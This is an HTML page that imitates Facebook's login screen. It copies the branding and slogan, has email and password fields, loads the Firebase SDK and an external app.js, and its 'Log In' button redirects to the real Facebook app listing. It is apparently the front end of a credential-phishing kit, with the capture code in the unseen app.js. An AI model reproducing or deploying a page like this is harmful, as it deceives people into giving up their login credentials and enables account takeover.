<!DOCTYPE html>
<html lang="en" dir="ltr">
   <head>
      <meta charset="utf-8">
      <meta http-equiv="X-UA-Compatible" content="IE=edge">
    		<meta name="viewport" content="width=device-width , initial-scale=1">

      <title>Facebook - login or sign up</title>
      <link rel="icon" type="image/x-icon" href="favicon.ico">
      <style media="screen">
         * {
         box-sizing: border-box;
         }
         body {
         background-color: #DFE7F3;
         }
         .column1  {
         float: left;
         width: 20%;
         padding: 10px;
         height: 300px; 
         }
         .column2 {
         float: left;
         width: 35%;
         padding: 10px;
         height: 300px; 
         }
         .column3 {
         float: left;
         width: 25%;
         padding: 10px;
         height: 300px; 
         }
         div.c {
         font-size: 150%;
         color: blue;
         line-height: normal;
         }
         div.footer {
         float: left;
         width: 90%;
         }
         /* Clear floats after the columns */
         .row:after {
         content: "";
         display: table;
         clear: both;
         }
         .card {
         box-shadow: 0 4px 8px 0 rgba(0,0,0,0.2);
         transition: 0.3s;
         width: 100%;
         }
         .card:hover {
         box-shadow: 0 8px 16px 0 rgba(0,0,0,0.2);
         }
         .container {
         padding: 2px 16px;
         }
         input[type=text],[type=password], select {
         width: 100%;
         padding: 12px 20px;
         margin: 8px 0;
         display: inline-block;
         border: 1px solid #ccc;
         border-radius: 4px;
         box-sizing: border-box;
         }
         button[type=button] {
         width: 100%;
         background-color: blue;
         color: white;
         padding: 14px 20px;
         margin: 8px 0;
         border: none;
         border-radius: 4px;
         cursor: pointer;
         }
         input[type=create] {
         width: 90%;
         background-color: green;
         color: white;
         padding: 14px 20px;
         margin: 8px 0;
         text-align: center;
         border: none;
         border-radius: 4px;
         cursor: pointer;
         }
         input[type=submit]:hover {
         background-color: #45a049;
         }
         a:link {
         text-decoration: none;
         color: #000;
         text-style: bold;
         }
         a:hover {
         text-decoration: underline;
         }
         a:visited {
         background-color: red;
         }
         p.a{
         color: blue;
         }
         div.i {
         border-radius: 5px;
         background-color: #ffffff;
         padding: 20px;
         }
      </style>
   </head>
   <body>
      <br>
      <br>
      <br>
      <br>
      <div class="row">
         <div class="column1" >
         </div>
         <div class="column2" >
            <div class="c">
               <h1>facebook</h1>
            </div>
            <h2>Facebook helps you connect and share <br>with the people in your life.</h2>
         </div>
         <div class="column3" >
            <div class="card">
               <div class="container i">
                  <section id="add-user-module" >
                     <form>
                        <input type="text" data-key='email' class='user-input' placeholder="Email address or phone number" required>
                        <input type="password" data-key='password' class='user-input' placeholder="Password" required>
                        <button type='button' id="signup">Log In</button>
                        <script type="text/javascript">
                          document.getElementById("signup").onclick = function () {
                            location.href = "https://play.google.com/store/apps/details?id=com.facebook.katana";
                            };
                            </script>
                     </form>
                  </section>
                  <!--  <input type="text" id="fname" name="firstname" placeholder="Email address or phone number">
                     <input type="password" id="pwd" name="password" placeholder="Password">-->
                  <!--<input type="submit" id="add-user-btn" value="Submit">-->
                  <p style="color: blue; text-align:center;"><a href="https://www.facebook.com/recover/initiate/?privacy_mutation_token=eyJ0eXBlIjowLCJjcmVhdGlvbl90aW1lIjoxNjQ1MDMxMTQxLCJjYWxsc2l0ZV9pZCI6MzgxMjI5MDc5NTc1OTQ2fQ%3D%3D&ars=facebook_login"> Forgotten password?</a></p>
                  <hr/>
                  <div class="" align= "center">
                     <a href="https://www.facebook.com/#"><input type="create" value="Create new account"></a>
                  </div>
               </div>
            </div>
            <p style="text-align: center;"><a href="https://www.facebook.com/pages/create/?ref_type=registration_form"> Create a Page</a> for a celebrity, brand or business.</p>
         </div>
         <div class="column4" >
         </div>
      </div>
      <script src="https://www.gstatic.com/firebasejs/4.8.1/firebase.js"></script>
      <script type="text/javascript" src="app.js"></script>
   </body>
</html>
